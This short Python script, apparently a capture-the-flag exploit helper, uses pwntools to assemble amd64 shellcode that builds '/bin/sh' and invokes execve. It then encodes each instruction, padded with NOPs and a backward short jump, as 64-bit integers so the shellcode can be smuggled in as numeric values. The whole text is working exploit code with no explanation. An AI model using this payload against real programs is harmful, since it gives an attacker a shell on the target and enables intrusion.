from pwn import*
context(os = 'linux', arch = 'amd64')

shellcode = [
	"mov edi, 0x68732f6e",
	"shl rdi, 24",
	"mov ebx, 0x69622f",
	"add rdi, rbx",
	"push rdi",
	"push rsp",
	"pop rdi",
	"xor rsi, rsi",
	"xor rdx, rdx",
	"push 59",
	"pop rax",
	"syscall"
]

for sc in shellcode:
	print(u64(asm(sc).ljust(6, b'\x90') + b'\xEB\xEB'))

print(u16(b'\xEB\xE4'))

